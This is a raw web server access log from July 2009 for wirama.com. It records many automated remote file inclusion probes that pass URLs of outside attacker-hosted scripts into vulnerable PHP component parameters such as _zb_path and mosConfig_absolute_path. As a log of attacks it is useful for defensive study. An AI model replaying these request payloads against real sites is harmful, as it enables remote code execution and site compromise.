66.96.240.245 - - [01/Jul/2009:23:24:30 -0700] "GET /logs/access_090401.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:24:59 -0700] "GET /logs/access_090330.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:25:12 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:25:12 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:25:12 -0700] "GET /logs/access_090401.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:25:16 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:25:16 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:25:16 -0700] "GET /logs/access_090331.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:25:39 -0700] "GET /logs/access_090330.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.10.166.250 - - [01/Jul/2009:23:26:49 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
72.10.166.250 - - [01/Jul/2009:23:26:49 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:27:26 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:27:27 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:27:28 -0700] "GET /logs/access_090331.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:29:08 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:29:09 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:29:10 -0700] "GET /logs/access_090331.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:29:14 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:29:15 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:29:15 -0700] "GET /logs/access_090330.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.77.32.217 - - [01/Jul/2009:23:30:04 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.77.32.217 - - [01/Jul/2009:23:30:04 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.77.32.217 - - [01/Jul/2009:23:30:05 -0700] "GET /logs/access_090531.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:30:59 -0700] "GET /logs///?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:30:59 -0700] "GET /logs/access_090330.log///?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:30:59 -0700] "GET //?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
72.10.166.250 - - [01/Jul/2009:23:31:02 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
72.10.166.250 - - [01/Jul/2009:23:31:02 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
72.10.166.250 - - [01/Jul/2009:23:31:02 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:31:07 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:31:08 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:31:08 -0700] "GET /logs/access_090601.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:31:35 -0700] "GET /logs/access_090601.log///?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:31:35 -0700] "GET //?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:31:35 -0700] "GET /logs///?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:31:58 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:31:59 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:32:00 -0700] "GET /logs/access_090601.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:32:08 -0700] "GET //?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:32:50 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:32:51 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:32:52 -0700] "GET /logs/access_090330.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:32:52 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:32:52 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:32:53 -0700] "GET /logs/access_090330.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:33:03 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:33:04 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:33:05 -0700] "GET /logs/access_090330.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:34:27 -0700] "GET /logs/access_090330.log///?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:34:27 -0700] "GET //?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:34:27 -0700] "GET /logs///?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:34:31 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:34:32 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:34:32 -0700] "GET /logs/access_090601.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:34:44 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:34:45 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:34:45 -0700] "GET /logs/access_090601.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:35:32 -0700] "GET /logs/access_090330.log///?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:35:32 -0700] "GET /logs///?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:35:32 -0700] "GET //?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:36:19 -0700] "GET /logs/access_090330.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:36:35 -0700] "GET /logs/access_090330.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:37:08 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:37:08 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:37:09 -0700] "GET /logs/access_090330.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:41:45 -0700] "GET /logs/access_090330.log//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:41:45 -0700] "GET /logs//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:41:45 -0700] "GET /?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:43:14 -0700] "GET /?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:43:14 -0700] "GET /logs//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:43:15 -0700] "GET /logs/access_090330.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:44:00 -0700] "GET /logs/access_090330.log//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:44:00 -0700] "GET /logs//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:44:00 -0700] "GET /?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:44:43 -0700] "GET /?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:44:44 -0700] "GET /logs//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:44:44 -0700] "GET /logs/access_090601.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:44:57 -0700] "GET /logs//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:44:57 -0700] "GET /logs/access_090601.log//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:44:57 -0700] "GET /?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:45:17 -0700] "GET /?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:45:17 -0700] "GET /logs/access_090330.log//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:45:17 -0700] "GET /logs//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:45:33 -0700] "GET /logs/access_090601.log//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:45:33 -0700] "GET /logs//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:45:33 -0700] "GET /?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:45:35 -0700] "GET /?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:45:35 -0700] "GET /logs//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:45:36 -0700] "GET /logs/access_090601.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:47:49 -0700] "GET /?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:47:49 -0700] "GET /logs/access_090330.log//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:47:49 -0700] "GET /logs//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "www.wirama.com"
200.107.138.34 - - [01/Jul/2009:23:48:41 -0700] "GET /logs/access_090601.log//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:48:41 -0700] "GET /?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:48:41 -0700] "GET /logs//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:48:57 -0700] "GET /?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:48:57 -0700] "GET /logs//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:48:58 -0700] "GET /logs/access_090330.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:49:12 -0700] "GET /?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:49:13 -0700] "GET /logs//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:49:13 -0700] "GET /logs/access_090330.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:23:49:48 -0700] "GET /?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:49:49 -0700] "GET /logs//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:49:49 -0700] "GET /logs/access_090601.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.10.166.250 - - [01/Jul/2009:23:49:54 -0700] "GET /logs/access_090601.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
72.10.166.250 - - [01/Jul/2009:23:49:54 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
72.10.166.250 - - [01/Jul/2009:23:49:54 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
61.78.62.84 - - [01/Jul/2009:23:50:10 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
61.78.62.84 - - [01/Jul/2009:23:50:10 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
61.78.62.84 - - [01/Jul/2009:23:50:10 -0700] "GET /logs/access_090330.log%22%20target=%22_blank//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:52:09 -0700] "GET /logs/access_090601.log//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:52:09 -0700] "GET /?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
200.107.138.34 - - [01/Jul/2009:23:52:09 -0700] "GET /logs//?_zb_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 200 2379 "-" "Mozilla/5.0" "wirama.com"
61.78.62.84 - - [01/Jul/2009:23:52:42 -0700] "GET /logs/access_090330.log%22%20target=%22_blank//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
61.78.62.84 - - [01/Jul/2009:23:52:42 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
61.78.62.84 - - [01/Jul/2009:23:52:42 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
61.78.62.84 - - [01/Jul/2009:23:53:59 -0700] "GET /logs/access_090331.log%22%20target=%22_blank//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
82.165.156.112 - - [01/Jul/2009:23:55:41 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:23:55:41 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:23:55:41 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:23:56:14 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:23:56:14 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:23:56:14 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:23:56:58 -0700] "GET /logs/access_090601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:23:57:18 -0700] "GET /logs/access_090601.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:23:57:19 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:23:57:19 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:23:57:19 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
61.78.62.84 - - [01/Jul/2009:23:57:34 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
